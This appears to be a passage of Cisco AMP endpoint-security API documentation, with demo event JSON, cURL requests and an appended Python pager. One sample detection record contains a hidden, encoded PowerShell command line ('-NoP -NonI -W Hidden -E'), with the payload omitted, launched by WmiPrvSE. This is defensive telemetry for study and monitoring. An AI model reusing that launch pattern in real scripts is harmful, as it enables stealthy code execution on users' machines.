"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"tactics": [
"TA0002",
"TA0005"
],
"bp_data": {
"audit": false,
"details": {
"actions": [
{
"action": "end_process",
"end_ts": 1602033881808,
"params": [
"10724"
],
"start_ts": 1602033881805,
"status": "success"
}
],
"eng_epoch": 1,
"eng_ver": "0.9.0.104",
"matched_activity": {
"events": [
{
"process:start": {
"app": "powershell.exe",
"app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"args": [
"powershell.exe",
"-NoP"
],
"cmd_line": "powershell.exe -NoP -NonI -W Hidden -E [encoded command omitted]",
"parent_app": "WmiPrvSE.exe",
"parent_app_path": "C:\\Windows\\System32\\wbem",
"parent_pid": 2236,
"parent_puid": 132461352663910600,
"parent_user": "SYSTEM",
"parent_user_sid": "010100000000000512000000",
"pid": 10724,
"puid": 132465072105597400,
"ts": 1602033881727175700,
"user": "SYSTEM",
"user_sid": "010100000000000512000000"
}
}
],
"limited": false,
"matched": 1
},
"schema": "endpoint",
"schema_epoch": 2,
"sig_id": 20190517123456,
"sig_rev": 5
},
"detection": "apde:20190517123456",
"end_ts": 1647533684,
"engine": "apde",
"id": "d2616Ab846",
"name": "WMIPRVSE Launched Encoded Powershell Command",
"observables": {
"file": [
{
"md5": "a575a7610e5f003cc36df39e07c4ba7d",
"name": "powershell.exe",
"path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
"sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
"size": 443392,
"type_id": 1
},
{
"md5": "d683c112190f4b4c6d477d693ee88e35",
"name": "WmiPrvSE.exe",
"path": "C:\\Windows\\System32\\wbem",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
"sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
"size": 425984,
"type_id": 1
}
]
},
"remediated": false,
"severity": "medium",
"silent": false,
"start_ts": 1647533684,
"tactics": [
"TA0002",
"TA0005"
],
"type": "activity",
"normalized": {
"observables": {
"file": {
"name": [
"powershell.exe",
"wmiprvse.exe"
],
"path": [
"c:\\windows\\system32\\windowspowershell\\v1.0",
"c:\\windows\\system32\\wbem"
]
}
},
"name": "wmiprvse launched encoded powershell command"
},
"demo": true
}
},
{
"id": 6880683125978957000,
"timestamp": 1647533684,
"timestamp_nanoseconds": 810000000,
"date": "2022-03-17T16:14:44+00:00",
"event_type": "Threat Detection",
"event_type_id": 553648222,
"detection": "WMIPRVSE Launched Encoded Powershell Command",
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"group_guids": [
"3aef61ae-a41f-4a89-a47d-1ce96164eea8"
],
"severity": "Medium",
"computer": {
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"hostname": "Demo_BP_WMIPRVSE",
"external_ip": "234.38.52.99",
"active": true,
"network_addresses": [
{
"ip": "157.184.70.94",
"mac": "67:71:7f:26:b1:5f"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"tactics": [
"TA0002",
"TA0005"
],
"bp_data": {
"audit": false,
"details": {
"actions": [
{
"action": "end_process",
"end_ts": 1602033881808,
"params": [
"10724"
],
"start_ts": 1602033881805,
"status": "success"
}
],
"eng_epoch": 1,
"eng_ver": "0.9.0.104",
"matched_activity": {
"events": [
{
"process:start": {
"app": "powershell.exe",
"app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"args": [
"powershell.exe",
"-NoP"
],
"cmd_line": "powershell.exe -NoP -NonI -W Hidden -E [encoded command omitted]",
"parent_app": "WmiPrvSE.exe",
"parent_app_path": "C:\\Windows\\System32\\wbem",
"parent_pid": 2236,
"parent_puid": 132461352663910600,
"parent_user": "SYSTEM",
"parent_user_sid": "010100000000000512000000",
"pid": 10724,
"puid": 132465072105597400,
"ts": 1602033881727175700,
"user": "SYSTEM",
"user_sid": "010100000000000512000000"
}
}
],
"limited": false,
"matched": 1
},
"schema": "endpoint",
"schema_epoch": 2,
"sig_id": 20190517123456,
"sig_rev": 5
},
"detection": "apde:20190517123456",
"end_ts": 1647533684,
"engine": "apde",
"id": "d2616Ab846",
"name": "WMIPRVSE Launched Encoded Powershell Command",
"observables": {
"file": [
{
"md5": "a575a7610e5f003cc36df39e07c4ba7d",
"name": "powershell.exe",
"path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
"sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
"size": 443392,
"type_id": 1
},
{
"md5": "d683c112190f4b4c6d477d693ee88e35",
"name": "WmiPrvSE.exe",
"path": "C:\\Windows\\System32\\wbem",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
"sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
"size": 425984,
"type_id": 1
}
]
},
"remediated": false,
"severity": "medium",
"silent": false,
"start_ts": 1647533684,
"tactics": [
"TA0002",
"TA0005"
],
"type": "activity",
"normalized": {
"observables": {
"file": {
"name": [
"powershell.exe",
"wmiprvse.exe"
],
"path": [
"c:\\windows\\system32\\windowspowershell\\v1.0",
"c:\\windows\\system32\\wbem"
]
}
},
"name": "wmiprvse launched encoded powershell command"
},
"demo": true
}
}
]
}
Fetch events that are newer than a given timestamp
Request
Requires Authorization
GET /v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 882
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2819
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"f38bca3490486478ae1e334d05620dab"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10",
"prev": "https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=0",
"next": "https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=20"
},
"results": {
"total": 1165,
"current_item_count": 10,
"index": 10,
"items_per_page": 10
}
},
"data": [
{
"id": 6533671385032557000,
"timestamp": 1647599259,
"timestamp_nanoseconds": 25000000,
"date": "2022-03-18T10:27:39+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671385032556606",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "\\\\?\\C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
},
{
"id": 6533671385032557000,
"timestamp": 1647599259,
"timestamp_nanoseconds": 14000000,
"date": "2022-03-18T10:27:39+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671380737589309",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by SCAN_STARTED event type
Request
Requires Authorization
GET /v0/events?event_type%5B%5D=554696714&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10'
Response
Shortened for readability
content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 881
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2818
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"b56febc4957bc8a938e00d78749ea321"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10"
},
"results": {
"total": 10,
"current_item_count": 10,
"index": 0,
"items_per_page": 10
}
},
"data": [
{
"id": 5832364858376454000,
"timestamp": 1647598024,
"timestamp_nanoseconds": 772000000,
"date": "2022-03-18T10:07:04+00:00",
"event_type": "Scan Started",
"event_type_id": 554696714,
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"group_guids": [
"af1e7d79-880b-4aaf-84d4-06149fef0cd2",
"8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
],
"computer": {
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"hostname": "Demo_ZAccess",
"external_ip": "142.204.149.196",
"active": true,
"network_addresses": [
{
"ip": "236.208.251.95",
"mac": "6c:0d:af:5b:90:51"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"scan": {
"description": "C:\\Program Files\\DVD Maker"
}
},
{
"id": 5832364789656977000,
"timestamp": 1647598008,
"timestamp_nanoseconds": 193000000,
"date": "2022-03-18T10:06:48+00:00",
"event_type": "Scan Started",
"event_type_id": 554696714,
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"group_guids": [
"af1e7d79-880b-4aaf-84d4-06149fef0cd2",
"8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
],
"computer": {
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"hostname": "Demo_ZAccess",
"external_ip": "142.204.149.196",
"active": true,
"network_addresses": [
{
"ip": "236.208.251.95",
"mac": "6c:0d:af:5b:90:51"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"scan": {
"description": "C:\\Program Files\\Microsoft Games"
}
}
]
}
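As an added example covering both requests above (paging from a start_date and filtering by event_type[]), this is not Cisco's client code: a small pager that follows metadata.links.next and stops on the x-ratelimit-remaining header. The `fetch` callable is an injected stand-in for an authenticated HTTP GET, and `_demo_fetch` serves constructed data in the response shape shown on this page.

```python
# Added example (not Cisco's code): pages through GET /v0/events by following
# metadata.links.next, using the response shape shown above. fetch() is an
# injectable stand-in for an authenticated HTTP GET so the logic runs offline.
from urllib.parse import urlencode, urlparse, parse_qs

BASE = "https://api.consumer.amp.cisco.com/v0/events"
SCAN_STARTED = 554696714  # event_type id from the page's second example

def build_url(start_date=None, event_types=(), limit=10, offset=0):
    # Criteria are ANDed; repeated event_type[] values are ORed together.
    params = [("limit", limit), ("offset", offset)]
    if start_date:
        params.append(("start_date", start_date))
    params += [("event_type[]", t) for t in event_types]
    return BASE + "?" + urlencode(params)

def iter_events(fetch, url, max_pages=100):
    """fetch(url) -> (headers, body). Yields each event once, following next links."""
    seen = set()
    for _ in range(max_pages):
        headers, body = fetch(url)
        if int(headers.get("x-ratelimit-remaining", 1)) <= 0:
            raise RuntimeError("rate limit hit; wait x-ratelimit-reset seconds")
        for ev in body["data"]:
            # The sample shows two distinct detections sharing one rounded "id"; never dedupe on id alone.
            key = (ev["id"], ev.get("detection_id"), ev["timestamp"], ev["timestamp_nanoseconds"])
            if key not in seen:
                seen.add(key)
                yield ev
        url = body["metadata"]["links"].get("next")  # absent on the last page
        if not url:
            return

def _demo_fetch(url, total=23):
    """Constructed stand-in for the API: serves `total` synthetic events in pages."""
    q = parse_qs(urlparse(url).query)
    offset, limit = int(q.get("offset", ["0"])[0]), int(q["limit"][0])
    wanted = {int(t) for t in q.get("event_type[]", [])}
    kind = lambda i: SCAN_STARTED if i % 2 else 1090519054  # alternate Scan Started / Threat Detected
    events = [{"id": 6533671385032557000, "detection_id": str(6533671385032556606 - i),
               "timestamp": 1647599259, "timestamp_nanoseconds": 1000000 * i, "event_type_id": kind(i)}
              for i in range(total) if not wanted or kind(i) in wanted]
    page, links = events[offset:offset + limit], {"self": url}
    if offset + limit < len(events):
        links["next"] = build_url(q.get("start_date", [None])[0], q.get("event_type[]", []), limit, offset + limit)
    body = {"version": "v0.2.2", "metadata": {"links": links, "results": {"total": len(events)}}, "data": page}
    return {"x-ratelimit-remaining": "2819"}, body

def collect(start_date=None, event_types=(), limit=10):
    return list(iter_events(_demo_fetch, build_url(start_date, event_types, limit)))
```

Swap `_demo_fetch` for a function that performs the authenticated GET from the cURL examples and returns `(response.headers, response.json())` to run it against the real endpoint.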